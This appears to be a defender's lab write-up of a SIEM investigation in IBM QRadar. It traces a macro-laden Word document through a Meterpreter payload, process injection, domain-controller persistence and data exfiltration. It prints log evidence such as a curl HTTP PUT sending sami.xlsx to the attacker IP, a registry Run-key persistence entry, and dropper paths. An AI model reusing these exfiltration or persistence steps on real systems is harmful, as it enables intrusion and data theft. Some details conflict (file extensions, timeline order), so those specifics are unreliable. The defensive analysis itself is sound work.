Skip to main content

CDEF-Qradar101

Table of Contents

TL;DR
#

A phishing document delivered via download triggered a multi-stage infection chain on host 192.168.10.15 (HD-FIN-03). The malicious Word document important_instructions.docx dropped FSETPBEUsIek.exe, which spawned cmd.exe, wrote and executed a VBS script, used cscript.exe to drop a secondary executable, injected a thread into notepad.exe. The attacker established persistence via a registry Run key pointing to a VBS file in C:\Windows\TEMP. A second compromised host 192.168.10.29 later exfiltrated sami.xls to the attacker IP 192.20.80.25 via HTTP PUT. Suricata detected Metasploit metsrv.x86.dll payloads in traffic to both victim hosts.

Initial Triage
#

The investigation started with a broad overview of all events in IBM QRadar - a SIEM platform that aggregates logs from multiple sources, correlates them into offenses, and assigns magnitude scores based on severity and relevance. I began by examining the Top 10 Event Name Results by Count to understand the distribution of event types across the timeframe.

Top 10 events

To focus on the most critical events, I filtered by Magnitude to surface the highest-severity correlated events.

Filtered events

The filtered view surfaced NIDS Alerts from SO-Suricata with the highest magnitude scores, alongside Module Logging Command Invocation, PowerShell Console events, and a QRadar custom rule hit for Exploit Followed by Suspicious Host Activity - Chained. I started with the Suricata alerts as they indicated active network-level exploitation.

Reviewing the connections view confirmed three victim IPs communicating with the attacker 192.20.80.25 192.168.10.29, and revealed a second Suricata hit on Nov 9, 2020 targeting 192.168.20.20 (DC) - suggesting the attacker pivoted after the initial compromise.

Connections

Initial Access
#

The Suricata NIDS alert at Nov 8, 2020, 22:30:49 triggered on traffic between 192.20.80.25 (attacker) and 192.168.10.15 (patient zero, HD-FIN-03):

1ET MALWARE Possible Metasploit Payload Common Construct Bind_API (from server)
2Category: A Network Trojan was detected

Connections
Alert detail

Examining the payload, the UTF view revealed metsrv.x86.dll and ReflectiveLoader strings - confirming this is a Metasploit Meterpreter reverse shell payload delivered as a reflectively-loaded DLL.

Payload information

Execution Chain
#

Pivoting to process creation events on 192.168.10.15 and sorting chronologically revealed the full execution chain. At 22:30:03 WINWORD.EXE launched with the following command:

1"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n
2"C:\Users\nour.HACKDEFEND\Downloads\important_instructions.docx" /o ""

Word initial access

The user nour opened important_instructions.docx (MD5: 9D08221599FCD9D35D11F9CBD6A0DEA3) from the Downloads folder. The /o "" flag suppresses the splash screen, consistent with a document that auto-executes a macro on open. At 22:30:51 - 48 seconds after Word launched - a new process was created directly in the user’s profile directory:

1C:\Users\nour.HACKDEFEND\FSETPBEUsIek.exe
2MD5: 6F37EB2B7F6720B48588FB2B84ED17C8

Process creation
Process creation log

The random-looking name FSETPBEUsIek.exe dropped directly into the user’s home folder is a strong indicator of a VBA macro dropper - Word macros commonly write and execute payloads to the current user’s directory without requiring elevated privileges.

At 22:32:37 FSETPBEUsIek.exe spawned cmd.exe:

1C:\Windows\system32\cmd.exe
2CurrentDirectory: C:\Users\nour.HACKDEFEND\
3User: HACKDEFEND\nour

At 22:35:04 the executable wrote and executed a VBS script:

1FSETPBEUsIek.exe → C:\Users\NOUR~1.HAC\AppData\Local\Temp\uCOadJlMb.vbs

VBS execution

At 22:35:17 cscript.exe executed the VBS script, which in turn dropped a secondary executable:

1C:\Windows\SysWOW64\cscript.exe
2TargetFilename: C:\Users\NOUR~1.HAC\AppData\Local\Temp\radD54BD.tmp\FaFRuwJIlNvBNaT.exe

Process Injection and Privilege Escalation
#

At 22:35:37 a CreateRemoteThread event was logged - a process injects a thread into another process, which is the primary mechanism used by Meterpreter to migrate into a less suspicious host process:

1Source: C:\Users\nour.HACKDEFEND\FSETPBEUsIek.exe
2Target: C:\Windows\SysWOW64\notepad.exe

Process injection

By injecting into notepad.exe, the malware migrated its execution context into a trusted Windows process. At 22:35:46 - nine seconds after the injection - a Success Audit: An account was successfully logged on event fired with AccountName: SYSTEM, confirming the injected code successfully escalated privileges to SYSTEM.

Lateral Movement and Persistence
#

On Nov 9, 2020, 09:51:45 Suricata fired a second Metasploit payload alert - this time with source 192.20.80.25 and destination 192.168.20.20 (the Domain Controller), confirming the attacker pivoted laterally from HD-FIN-03 to the DC.

Shortly after, at 09:53:39, a Sysmon RegistryEvent (Value Set) (Event ID 13) was logged on the DC:

1Image:         C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2Target Object: HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\SsGHOMcjsj
3Target Details: C:\Windows\TEMP\PjvQTe.vbs

DC persistence

The attacker used PowerShell to write a VBS file path into the HKCU\...\Run registry key under the DEFAULT user hive.

Exfiltration
#

Filtering events for the second victim host 192.168.10.29 and the attacker IP revealed a Suricata alert at Nov 9, 2020, 10:29:52:

1ET INFO Dotted Quad Host XLSX Request
2ET POLICY curl User-Agent Outbound

Examining the payload of the associated HTTP connection confirmed active exfiltration:

1PUT /sami.xlsx
2Host: 192.20.80.25
3User-Agent: curl/7.55.1
4Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
5request_body_len: 43062

Exfiltration

The attacker used curl to upload sami.xlsx (43 KB) via HTTP PUT directly to their server at 192.20.80.25. The curl User-Agent and dotted-quad host in a spreadsheet request are both highly anomalous and were correctly flagged by Suricata.

IOCs
#

IPs
- 192.20.80.25 - attacker IP and Metasploit C2 server
- 192.168.10.15 - patient zero (HD-FIN-03, user nour)
- 192.168.10.29 - second compromised host (exfiltration source)
- 192.168.20.20 - Domain Controller (lateral movement target, persistence established)
Files
- important_instructions.doc - MD5:9D08221599FCD9D35D11F9CBD6A0DEA3 - C:\Users\nour.HACKDEFEND\FSETPBEUsIek.exe - MD5:6F37EB2B7F6720B48588FB2B84ED17C8
- C:\Users\NOUR1.HAC\AppData\Local\Temp\uCOadJlMb.vbs - VBS dropper
- C:\Users\NOUR1.HAC\AppData\Local\Temp\radD54BD.tmp\FaFRuwJIlNvBNaT.exe - secondary payload
- C:\Windows\TEMP\PjvQTe.vbs - persistence VBS script
- sami.xlsx - exfiltrated file Registry
- HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\SsGHOMcjsj - persistence key
Accounts
- HACKDEFEND\nour - compromised user account

Attack Timeline
#

%%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%%
graph TD
    classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000;
    classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000;
    classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000;
    classDef inject fill:#fff3e0,stroke:#e65100,stroke-width:2px,color:#000;
    classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000;
    classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000;
    classDef c2 fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000;
    classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000;

    A([nour - 192.168.10.15
HD-FIN-03]):::start --> B[Nov 8 22:30:03 - WINWORD.EXE opened
important_instructions.docx
MD5: 9D08221599FCD9D35D11F9CBD6A0DEA3]:::access B --> C[Nov 8 22:30:51 - VBA macro drops
FSETPBEUsIek.exe
MD5: 6F37EB2B7F6720B48588FB2B84ED17C8]:::exec C --> D[Nov 8 22:32:37 - cmd.exe spawned]:::exec C --> E[Nov 8 22:35:04 - VBS written
uCOadJlMb.vbs]:::exec E --> F[Nov 8 22:35:17 - cscript.exe drops
FaFRuwJIlNvBNaT.exe]:::exec subgraph Injection [Injection and Escalation] F --> G[Nov 8 22:35:37 - CreateRemoteThread
inject into notepad.exe]:::inject G --> H[Nov 8 22:35:46 - SYSTEM logon confirmed]:::inject H --> I[Nov 8 22:30:49 - Suricata
metsrv.x86.dll detected
192.20.80.25 to 192.168.10.15]:::c2 end subgraph Lateral [Lateral Movement and Persistence] I --> J[Nov 9 09:51:45 - Suricata
Metasploit payload
192.20.80.25 to DC 192.168.20.20]:::persist J --> K[Nov 9 09:53:39 - Registry Run key
HKU\DEFAULT\...\Run\SsGHOMcjsj
C:\Windows\TEMP\PjvQTe.vbs]:::persist end subgraph Exfil [Exfiltration] K --> L[Nov 9 10:29:52 - curl PUT /sami.xlsx
192.168.10.29 to 192.20.80.25
43062 bytes]:::exfil end